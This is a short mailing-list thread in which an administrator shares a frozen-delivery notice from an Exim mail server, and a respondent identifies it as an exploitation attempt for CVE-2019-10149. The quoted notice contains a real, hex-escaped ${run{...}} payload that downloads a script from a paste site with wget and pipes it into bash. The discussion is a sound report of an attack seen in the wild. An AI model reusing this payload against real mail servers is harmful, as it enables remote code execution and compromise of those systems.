Am 13.10.20 um 16:00 schrieb Daniel Leidert:
Am Dienstag, den 13.10.2020, 08:51 +0200 schrieb Knieling, Christian (IANM):
To whom this may concern,
I got a system message from my mailer daemon lately. It contains
-------------------------------- cut --------------------------------
Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
The sender is <>.
The following address(es) have yet to be delivered:
${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-
\thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbas
h\x22}}@ianm-mang.math.kit.edu:
Too many "Received" headers - suspected mail loop
-------------------------------- cut --------------------------------
[..]
I don't know if this messages reaches the right persons, but someone may
forward it. You may at least remove the files which are accessible on
paste.debian.net.
Clearly someone tries to run a command put as an address. Out of curiosity:
Which kind of vulnerability are they trying to use here?
Regards, Daniel
Hi,
I think some Exim4 exploit, see CVE-2019-10149 [1].
Cheers,
Martin
[1] https://security-tracker.debian.org/tracker/CVE-2019-10149
